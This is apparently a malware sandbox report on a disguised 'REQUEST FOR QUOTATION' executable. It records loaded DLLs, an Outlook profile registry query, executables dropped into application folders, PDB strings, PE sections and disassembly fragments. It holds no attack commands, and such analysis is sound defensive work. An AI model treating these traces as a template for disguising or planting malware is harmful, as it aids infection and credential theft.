Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: esent.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: version.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: appmanagementconfiguration.dll
Source: C:\Windows\System32\vds.exe	Section loaded: atl.dll
Source: C:\Windows\System32\vds.exe	Section loaded: osuninst.dll
Source: C:\Windows\System32\vds.exe	Section loaded: vdsutil.dll
Source: C:\Windows\System32\vds.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\vds.exe	Section loaded: uexfat.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ifsutil.dll
Source: C:\Windows\System32\vds.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\vds.exe	Section loaded: uudf.dll
Source: C:\Windows\System32\vds.exe	Section loaded: untfs.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ufat.dll
Source: C:\Windows\System32\vds.exe	Section loaded: fmifs.dll
Source: C:\Windows\System32\vds.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: virtdisk.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: spp.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: wer.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: fveapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: cscapi.dll

Source: C:\Windows\System32\msdtc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Drops executable to a common third party application directory

Source: REQUEST FOR QUOTATION 1307-RFQ.exe

Static file information: File size 1553920 > 1048576

Source: REQUEST FOR QUOTATION 1307-RFQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1661345317.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000001.00000003.1918851926.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdb source: armsvc.exe, 00000001.00000003.1789345540.0000000002050000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000001.00000003.2033681360.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000001.00000003.2033681360.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vssvc.pdb source: WBEngine.0.etl.23.dr, VSSVC.exe.1.dr
Source:	Binary string: msiexec.pdbGCTL source: armsvc.exe, 00000001.00000003.1724571249.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.1.dr
Source:	Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000001.00000003.1695308775.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000001.00000003.2283149621.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2278981032.00000000008F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: armsvc.exe, 00000001.00000003.1731714155.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.1.dr
Source:	Binary string: wntdll.pdb source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1669961258.0000000004090000.00000004.00001000.00020000.00000000.sdmp, REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1669485567.00000000041F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Spectrum.pdb source: Spectrum.exe.1.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000001.00000003.2007127631.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: armsvc.exe, 00000001.00000003.1753798899.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: armsvc.exe, 00000001.00000003.1753798899.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000001.00000003.2264919855.00000000008F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000001.00000003.2186860033.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2194688859.0000000000680000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: tnameserv.exe.1.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatExe.pdb source: Acrobat.exe.1.dr
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: armsvc.exe, 00000001.00000003.1685892753.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: rmid.exe.1.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000001.00000003.1941028888.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000001.00000003.1927307641.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: armsvc.exe, 00000001.00000003.1713030613.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000001.00000003.1739406959.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1740521550.0000000002080000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1743596231.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000001.00000003.2264919855.00000000008F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000001.00000003.2077685079.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: rmid.exe.1.dr
Source:	Binary string: PerfHost.pdb source: armsvc.exe, 00000001.00000003.1739406959.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1740521550.0000000002080000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1743596231.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000001.00000003.2099016563.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: tnameserv.exe.1.dr
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000001.00000003.2186860033.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2194688859.0000000000680000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1669961258.0000000004090000.00000004.00001000.00020000.00000000.sdmp, REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1669485567.00000000041F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: armsvc.exe, 00000001.00000003.1803769593.0000000002050000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000001.00000003.1803769593.0000000002050000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.1.dr
Source:	Binary string: ALG.pdb source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1664964581.0000000003E90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: uudf.pdb source: WBEngine.0.etl.23.dr
Source:	Binary string: msdtcexe.pdb source: armsvc.exe, 00000001.00000003.1719283145.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: armsvc.exe, 00000001.00000003.1685892753.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vssvc.pdbUGP source: VSSVC.exe.1.dr
Source:	Binary string: snmptrap.pdb source: armsvc.exe, 00000001.00000003.1766189016.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.2149428363.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000001.00000003.2259110145.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000001.00000003.2179775011.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000001.00000003.2231521941.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2240478755.0000000000680000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2230232591.0000000000A70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: armsvc.exe, 00000001.00000003.1724571249.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000001.00000003.2047861389.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.1.dr
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.1.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000001.00000003.2173687677.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000001.00000003.1843747146.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdateOnDemand.exe.1.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000001.00000003.2077685079.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.1.dr
Source:	Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000001.00000003.1927307641.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Spectrum.pdbGCTL source: Spectrum.exe.1.dr
Source:	Binary string: locator.pdb source: armsvc.exe, 00000001.00000003.1745305912.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1750025499.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000001.00000003.2047861389.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wbengine.pdb source: WBEngine.0.etl.23.dr
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000001.00000003.2231521941.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2240478755.0000000000680000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2230232591.0000000000A70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.1.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000001.00000003.2007127631.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000001.00000003.2099016563.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000001.00000003.1918851926.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.1.dr
Source:	Binary string: mavinject32.pdb source: armsvc.exe, 00000001.00000003.2283149621.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2278981032.00000000008F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000001.00000003.1766189016.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000001.00000003.1731714155.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: armsvc.exe, 00000001.00000003.1719283145.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.2160709430.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000001.00000003.2143704164.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb source: ADNotificationManager.exe.1.dr
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000001.00000003.2149428363.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000001.00000003.2179775011.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ifsutil.pdb source: WBEngine.0.etl.23.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000001.00000003.2173687677.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000001.00000003.1713030613.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: udfs.pdb source: WBEngine.0.etl.23.dr
Source:	Binary string: WmiApSrv.pdb source: armsvc.exe, 00000001.00000003.1843747146.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000001.00000003.2106165754.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.1.dr
Source:	Binary string: ALG.pdbGCTL source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1664964581.0000000003E90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000001.00000003.1695308775.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: armsvc.exe, 00000001.00000003.1745305912.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1750025499.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000001.00000003.1941028888.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb22 source: ADNotificationManager.exe.1.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
Source:	Binary string: ssh-agent.pdbX source: armsvc.exe, 00000001.00000003.1789345540.0000000002050000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: armsvc.exe, 00000001.00000003.2259110145.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000001.00000003.2106165754.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vssapi.pdb source: WBEngine.0.etl.23.dr
Source:	Binary string: spp.pdb source: WBEngine.0.etl.23.dr

Source: alg.exe.0.dr

Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: armsvc.exe.0.dr	Static PE information: section name: .didat
Source: alg.exe.0.dr	Static PE information: section name: .didat
Source: default-browser-agent.exe.1.dr	Static PE information: section name: .00cfg
Source: default-browser-agent.exe.1.dr	Static PE information: section name: .voltbl
Source: firefox.exe.1.dr	Static PE information: section name: .00cfg
Source: firefox.exe.1.dr	Static PE information: section name: .freestd
Source: firefox.exe.1.dr	Static PE information: section name: .retplne
Source: firefox.exe.1.dr	Static PE information: section name: .voltbl
Source: GoogleCrashHandler64.exe.1.dr	Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.1.dr	Static PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.1.dr	Static PE information: section name: .gehcont
Source: GoogleUpdateComRegisterShell64.exe.1.dr	Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.1.dr	Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.1.dr	Static PE information: section name: .gehcont
Source: maintenanceservice.exe.1.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.1.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.1.dr	Static PE information: section name: _RDATA
Source: minidump-analyzer.exe.1.dr	Static PE information: section name: .00cfg
Source: minidump-analyzer.exe.1.dr	Static PE information: section name: .voltbl
Source: 117.0.5938.132_chrome_installer.exe.1.dr	Static PE information: section name: .00cfg
Source: 117.0.5938.132_chrome_installer.exe.1.dr	Static PE information: section name: .retplne
Source: pingsender.exe.1.dr	Static PE information: section name: .00cfg
Source: pingsender.exe.1.dr	Static PE information: section name: .voltbl
Source: plugin-container.exe.1.dr	Static PE information: section name: .00cfg
Source: plugin-container.exe.1.dr	Static PE information: section name: .voltbl
Source: private_browsing.exe.1.dr	Static PE information: section name: .00cfg
Source: private_browsing.exe.1.dr	Static PE information: section name: .voltbl
Source: updater.exe.1.dr	Static PE information: section name: .00cfg
Source: updater.exe.1.dr	Static PE information: section name: .voltbl
Source: updater.exe.1.dr	Static PE information: section name: _RDATA
Source: FXSSVC.exe.1.dr	Static PE information: section name: .didat
Source: elevation_service.exe.1.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.1.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.1.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.1.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.1.dr	Static PE information: section name: malloc_h
Source: elevation_service.exe0.1.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe0.1.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.1.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.1.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.1.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe0.1.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe0.1.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe0.1.dr	Static PE information: section name: _RDATA
Source: msdtc.exe.1.dr	Static PE information: section name: .didat
Source: msiexec.exe.1.dr	Static PE information: section name: .didat
Source: MsSense.exe.1.dr	Static PE information: section name: .didat
Source: Spectrum.exe.1.dr	Static PE information: section name: .didat
Source: TieringEngineService.exe.1.dr	Static PE information: section name: .didat
Source: vds.exe.1.dr	Static PE information: section name: .didat
Source: VSSVC.exe.1.dr	Static PE information: section name: .didat
Source: unpack200.exe.1.dr	Static PE information: section name: .00cfg
Source: WmiApSrv.exe.1.dr	Static PE information: section name: .didat
Source: wmpnetwk.exe.1.dr	Static PE information: section name: .didat
Source: SearchIndexer.exe.1.dr	Static PE information: section name: .didat
Source: ie_to_edge_stub.exe.1.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.1.dr	Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.1.dr	Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.1.dr	Static PE information: section name: _RDATA
Source: cookie_exporter.exe.1.dr	Static PE information: section name: .00cfg
Source: cookie_exporter.exe.1.dr	Static PE information: section name: .gxfg
Source: cookie_exporter.exe.1.dr	Static PE information: section name: .retplne
Source: cookie_exporter.exe.1.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.1.dr	Static PE information: section name: .00cfg
Source: identity_helper.exe.1.dr	Static PE information: section name: .gxfg
Source: identity_helper.exe.1.dr	Static PE information: section name: .retplne
Source: identity_helper.exe.1.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.1.dr	Static PE information: section name: malloc_h
Source: setup.exe.1.dr	Static PE information: section name: .00cfg
Source: setup.exe.1.dr	Static PE information: section name: .gxfg
Source: setup.exe.1.dr	Static PE information: section name: .retplne
Source: setup.exe.1.dr	Static PE information: section name: LZMADEC
Source: setup.exe.1.dr	Static PE information: section name: _RDATA
Source: setup.exe.1.dr	Static PE information: section name: malloc_h
Source: msedgewebview2.exe.1.dr	Static PE information: section name: .00cfg
Source: msedgewebview2.exe.1.dr	Static PE information: section name: .gxfg
Source: msedgewebview2.exe.1.dr	Static PE information: section name: .retplne
Source: msedgewebview2.exe.1.dr	Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.1.dr	Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.1.dr	Static PE information: section name: _RDATA
Source: msedgewebview2.exe.1.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe.1.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe.1.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe.1.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe.1.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe.1.dr	Static PE information: section name: malloc_h

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0046848F push FFFFFF8Bh; iretd	0_2_00468491
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0042E70F push edi; ret	0_2_0042E711
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0042E828 push esi; ret	0_2_0042E82A
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00428945 push ecx; ret	0_2_00428958
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0042EA03 push esi; ret	0_2_0042EA05
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0042EAEC push edi; ret	0_2_0042EAEE
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00402F12 push es; retf	0_2_00402F13
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00AEB180 push 00AEB0CAh; ret	0_2_00AEB061
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00AEB180 push 00AEB30Dh; ret	0_2_00AEB1E6
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00AEB180 push 00AEB2F2h; ret	0_2_00AEB262
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00AEB180 push 00AEB255h; ret	0_2_00AEB2ED
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00AEB180 push 00AEB2D0h; ret	0_2_00AEB346
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00AEB180 push 00AEB37Fh; ret	0_2_00AEB3B7
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00AE520C push 00AE528Fh; ret	0_2_00AE522D
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B0852Eh; ret	0_2_00B07F3A
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B08514h; ret	0_2_00B07F66
